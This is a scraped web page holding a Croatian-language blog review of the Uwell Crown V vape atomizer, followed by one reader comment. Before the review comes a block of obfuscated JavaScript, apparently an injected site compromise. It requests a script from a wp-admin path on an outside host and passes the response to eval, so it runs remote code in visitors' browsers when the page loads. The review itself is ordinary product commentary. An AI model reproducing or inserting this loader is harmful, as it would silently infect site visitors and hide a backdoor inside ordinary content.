;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Uwell Crown V- Kruna za kralja

Potraga za boljim okusom na sub-ohm atomizerima s gotovim grijačima me dovela do ovog malenog i zgodnog uređaja. Crown je cijelo vrijeme bio u glavi, svrbio misli s obećanjima fantastičnog razvijanja okusa, sustava samočišćenja pa sam odlučio ugristi mamac, kao proždrljivi som. Napokon sam raskrstio kratku aferu koju sam imao sa Smok Baby Beast V2 koji je muku mučio s brtvama i nismo si nas dvojica odgovarali.

Smok je htio oblake pare, meni je bilo svejedno oko toga, ja sam htio okus, a Smoku je bilo apsolutno svejedno. Prošao dan nakon narudžbe, zvoni telefon i GLS kurir kaže da ima paket za Luku Javorovića. Ja sam se sjurio niz stepenice, “oteo” paket iz ruku kurira i pravac u stan kako bih sam sebe uvjerio kako sam dobro izabrao atomizer ovog puta.

Sadržaj pakiranja i anatomija atomizera

Otvaram pakiranje u kojem dolazi i vidim crnu kutijicu koja na sebi ima lijepu zlatnu grafiku s prikazima obrisa atomizera. U kutijici  imam što vidjeti: lijepo su u svojim ležištima atomizer, rezervno bubble staklo zapremine 5ml (jer kod ovakvih atomizera manja zapremina nema smisla), dva grijača, kontracepcija za drip tip (navlaka koja ga štiti od nečistoća, prljavštine,…) i standardna literatura. Na vrhu je drip tip promjera 510 koji meni, kao DL korisniku, ne odgovara baš najbolje, no kada sam stavio univerzalni drip tip s postavkom na na wide bore, atomizer je doslovno “prodisao”. Ovdje dolazimo do jedine mane, a to je child proof sustav. Zbog njega se poklopac vrti, vrti, vrti i vrti u nedogled (i tek tada nešto počne grebati pa ždere živce, a čovjek ludi) dok ne pritisnete oprugu, a zarezi poklopca naprave svoj put i tada se otvara atomizer.

Tu se nalazi otvor kroz kojeg ide para s grijača i jedna lijepa brtvica čija je funkcija zatvaranje spremnika, s ciljem kako se ne bi sve razlilo i koja, kad se eventualno raspara zbog korištenja, ne utječe na “suhoću” cijelog uređaja. Spremnik, pristojnog kapaciteta od 5ml, u sebi ima metalni kavez za grijač i tu je potrebno obratiti pažnju budući da grijač treba namjestiti tako da otvori grijača odgovaraju s otvorima kaveza jer u suprotnom dobijete isti okus koji biste dobili da usta napunite vatom i zapalite ju. Naravno da su na kavez vulgarno nametnuli grafiku krune – jer ni slučajno ne smijete zaboraviti da imate Crown. Meni se osobno ne sviđa ta grafika i to silovanje brandiranjem, ali postoje i gori prekršitelji.

U dnu imamo otvore za protok zraka. Sâm obruč klizi prekrasno i tokom korištenja se nije niti jednom dogodilo da se promijenio protok zraka zbog nošenja u džepu. Obruč za kontrolu protoka zraka ima stopere kada ga se otvori do kraja, a broj otvora kroz kroji prolazi zrak je tri. Na dnu se nalazi 510 navoj kojim atomizer povezujete s modom te se u dnu nalazi pločica koja dodiruje grijač time ostvarujući protok struje. Na toj pločici možemo vidjeti otvore koji služe za prikupljanje kondenzata i ti isti otvori šalju kondenzat natrag u spremnik gdje se miješa s e-tekućinom što znači da je dno suho i čisto cijelo vrijeme.

Grijači se postavljaju umetanjem u komoru što znači da nema navoja, nema gluposti, a sve se lijepo rješava trenjem (digresija: Geekvape ima isti sustav na Zeusu u sub-ohm izdanju). Taj proces se se izvodi prstima te je jednostavan čak i za one koji imaju veliku i nezgrapnu ruku. Grijači dolaze u tri izvedbe: single mesh, dual mesh i triple mesh pa shodno tome možemo zaključiti da što je više zavojnica, manje je prostora za zrak i posljedično tome, restriktivnost protoka zraka raste. Probao sam single i dual mesh te me single osvojio pošto ne volim restriktivni protok zraka. I dual mesh je odradio svoju etapu, no nismo se baš složili pošto više naginje na tu restriktivniju stranu.

Dojmovi nakon korištenja i zaključak

Ako tražite što bolji okus na grijaču (a ne želite rebuild), nemate što dalje tražiti – ovo je “tour de force” što se tiče okusa. Zeus mu ne može ni vodu ponijeti (iako jako volim Zeus, no o njemu u drugoj recenziji), a sve druge atomizere s takvim grijačima deklasira. Okus koji dobijete je precizan, intenzivan i može se nositi i s rebuild atomizerima. Zaista sam uživao u svim aromama koje su prošle kroz njega (Glass, Bang, Klondo,… znam da sam fanboy Shakea, izvrsni su) i jako pozitivan dio cijele priče je to što je sâm atomizer dizajniran tako da bude neutralan što znači kako nema vrstu arome koju preferira te će suvereno prožvakati kreme, voće i duhan.

Toliko me se dojmio da bih ga preporučio svima koji ne rade rebuild, bilo da su početnik ili napredniji korisnik.

Choose your Reaction!
  • Odlična recenzija a bome i atomizer izgleda baš dobro. Koliko sam zaključio, dobro i radi pa eto, baš super da si zadovoljan njime.
    Osobno ipak ne bih atomizer na gotove grijače, ne da mi se razmišljati o tome koliko dugo će mi trajati i hoće li biti ispravni grijači koje sam kupio.
    Ovak si sam napravim grijač u par minuta i guštam u Vejpu. Kod gotovih grijača mi jednostavno fali taj ritual izrade grijača.
    Kad sam izradim grijač nakon toga sam nekako zadovoljniji dok parim, kad znam da uživam u plodovima svojeg truda ;)

Leave a Comment